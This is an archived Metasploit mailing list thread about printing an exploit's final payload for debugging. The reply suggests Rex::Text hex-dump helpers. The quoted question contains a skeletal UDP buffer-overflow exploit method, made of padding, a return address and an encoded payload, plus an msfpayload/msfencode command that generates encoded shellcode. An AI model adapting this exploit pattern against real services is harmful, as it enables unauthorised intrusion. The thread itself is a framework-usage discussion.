Home page logo
/

metasploit logo Metasploit mailing list archives

Re: printing payload for debug
From: egypt () metasploit com
Date: Wed, 2 Jun 2010 09:45:30 -0600

What you have should work, but if there are funny characters in the
string they will be printed, too, possibly causing problems with your
terminal.  Try using:
   print_status(Rex::Text.to_hex_dump(crash))
or if you just want the hex bytes:
   print_status(Rex::Text.to_hex(crash))

If you really want output identical to msfencode, see the various
methods like Rex::Text.to_ruby


Hope this helped,
egypt

On Wed, Jun 2, 2010 at 7:19 AM, nahidul kibria <nahidupa () gmail com> wrote:
hi,
how can i print final exploit data as alpha numeric i mean x86/alpha_mixed
before final send data

def exploit
        connect_udp
        print_status("Building Crash")
        crash =    "\x00\x01"
        crash += "\x41" * 256
        crash += [target.ret].pack('V')
        crash += payload.encoded
        crash += "\x00"
/////////try to print here..
        print_status(crash)
        udp_sock.put(crash)
        disconnect_udp
    end

or is there anyway to check final exploit output from ./msfconsole after
setting all other options. the way msfpayload do. (./msfpayload windows/cxec
cmd.exe R | ./msfencode -e x86/alpha_mixed)

thanks




_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]